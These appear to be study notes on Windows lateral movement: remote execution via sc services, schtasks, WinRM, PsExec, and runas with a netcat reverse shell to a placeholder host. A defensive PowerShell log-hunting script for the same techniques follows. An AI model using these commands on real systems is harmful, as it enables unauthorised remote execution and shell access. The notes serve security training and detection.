Spawning Processes Remotely
Required group: Administrators
Windows Services can also be leveraged to run arbitrary commands, since a service executes its configured command when it is started. While a service executable is technically different from a regular application, if we configure a Windows Service to run any application it will still execute it and then fail afterwards (the process never reports back to the Service Control Manager, so the start request times out), but by then the command has already run.
We can create a Service on a Remote Host with sc, which is a standard tool available in Windows. When using sc, it will try to connect to the Service Control Manager (SVCCTL) Remote Service Program through RPC.
Running as Another User
Runas allows a user to run specific tools and programs with different permissions than the user's current logon provides.
:: Spawning a Shell as [Another User] [Running Commands as the Other User]
runas /netonly /user:DOMAIN\USERNAME "C:\netcat.exe -e cmd.exe IP PORT"
Creating Services
:: Create a Remote Service
sc \\TARGET create SERVICE_NAME binPath= "Command/PAYLOAD To Run" start= auto
:: Start - Stop - Delete
sc \\TARGET start "SERVICE_NAME"
sc \\TARGET stop "SERVICE_NAME"
sc \\TARGET delete "SERVICE_NAME"
Creating Scheduled Tasks
:: Create
schtasks /s TARGET /RU "SYSTEM" /create /tn "TASK_NAME" /tr "Command/PAYLOAD To Run" /sc ONCE /sd 01/01/2024 /st 00:00
:: Run
schtasks /s TARGET /run /TN "TASK_NAME"
:: List Tasks (query the scheduler on the remote host; tasklist lists running processes, not scheduled tasks)
schtasks /s TARGET /query /TN "TASK_NAME" /V /FO LIST
:: Delete Tasks
schtasks /s TARGET /TN "TASK_NAME" /DELETE /F
Remote Process Creation Using WinRM
Required group: Remote Management Users
Windows Remote Management (WinRM) is a web-based protocol (WS-Management, SOAP over HTTP on port 5985 or HTTPS on port 5986) used to send PowerShell commands to Windows hosts remotely. Most Windows Server installations will have WinRM enabled by default.
- CMD
:: Create Interactive Session
winrs -u:USERNAME -p:PASSWORD -r:TARGET cmd
- PSH
# Creating PSCredential Object
$username = 'USERNAME';
$password = 'PASSWORD';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
# Create Interactive Session [Enter-PSSession]
Enter-PSSession -ComputerName TARGET -Credential $credential
# Run Commands Remotely [Invoke-Command]
Invoke-Command -ComputerName TARGET -Credential $credential -ScriptBlock {whoami}
PsExec
Required group: Administrators
PsExec allows an administrator to run commands remotely on any host where they have access.
:: Accept the EULA, otherwise the command won't work
PsExec64.exe -accepteula
PsExec64.exe \\TARGET_IP -u USERNAME -p PASSWORD -i cmd.exe
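As the defender-side counterpart to the techniques in these notes (remote services via sc, scheduled tasks via schtasks, WinRM sessions, PsExec), here is an added example that is not part of the original notes: a PowerShell sweep of the local event logs for the artefacts each technique leaves on the target. The look-back window and the `$shellLike` pattern are my own assumptions; the event IDs and field positions are those of stock Windows, and Security 4698 only exists when the "Audit Other Object Access Events" subcategory is enabled.

```powershell
# Hunt for host-side artefacts of remote service / task / WinRM / PsExec execution.
# Assumes stock Windows event IDs and EventData field order (assumption noted in the lead-in).
param([int]$Hours = 24)                       # look-back window (assumed default)
$since = (Get-Date).AddHours(-$Hours)
# A service or task whose "binary" is really a shell, script host or UNC path is the signature of sc/schtasks abuse
$shellLike = 'cmd\.exe|powershell|cscript|wscript|mshta|rundll32|\\\\'
$findings  = [System.Collections.Generic.List[object]]::new()

# 1. Service installs: System log, Event ID 7045 (source: Service Control Manager).
#    EventData order: ServiceName, ImagePath, ServiceType, StartType, AccountName
Get-WinEvent -FilterHashtable @{LogName='System'; Id=7045; StartTime=$since} -ErrorAction SilentlyContinue |
  ForEach-Object {
    $name = $_.Properties[0].Value
    $path = $_.Properties[1].Value
    # PSEXESVC is the service PsExec installs on the target; anything shell-like in binPath points at sc abuse
    $why = if ($name -eq 'PSEXESVC') { 'PsExec service' } elseif ($path -match $shellLike) { 'shell-like binPath' }
    if ($why) {
      $findings.Add([pscustomobject]@{ Time=$_.TimeCreated; Kind='Service'; Name=$name; Command=$path; Reason=$why })
    }
  }

# 2. Scheduled task creation: Security log, Event ID 4698.
#    EventData order: SubjectUserSid, SubjectUserName, SubjectDomainName, SubjectLogonId, TaskName, TaskContent (XML)
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4698; StartTime=$since} -ErrorAction SilentlyContinue |
  ForEach-Object {
    $task = [xml]$_.Properties[5].Value        # the task definition as registered, including its <Exec> actions
    foreach ($exec in @($task.Task.Actions.Exec)) {
      $cmd = "$($exec.Command) $($exec.Arguments)".Trim()
      if ($cmd -match $shellLike) {
        $findings.Add([pscustomobject]@{ Time=$_.TimeCreated; Kind='SchedTask'; Name=$_.Properties[4].Value; Command=$cmd; Reason='shell-like task action' })
      }
    }
  }

# 3. Inbound WinRM shells (winrs / Enter-PSSession / Invoke-Command):
#    Microsoft-Windows-WinRM/Operational, Event ID 91 "Creating WSMan shell on server".
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-WinRM/Operational'; Id=91; StartTime=$since} -ErrorAction SilentlyContinue |
  ForEach-Object {
    $findings.Add([pscustomobject]@{ Time=$_.TimeCreated; Kind='WinRMShell'; Name=''; Command=($_.Message -split "`r?`n")[0]; Reason='remote shell created' })
  }

$findings | Sort-Object Time | Format-Table Time, Kind, Name, Reason, Command -AutoSize -Wrap
```

Run it in an elevated PowerShell on the host being examined; reading the Security log requires administrative rights.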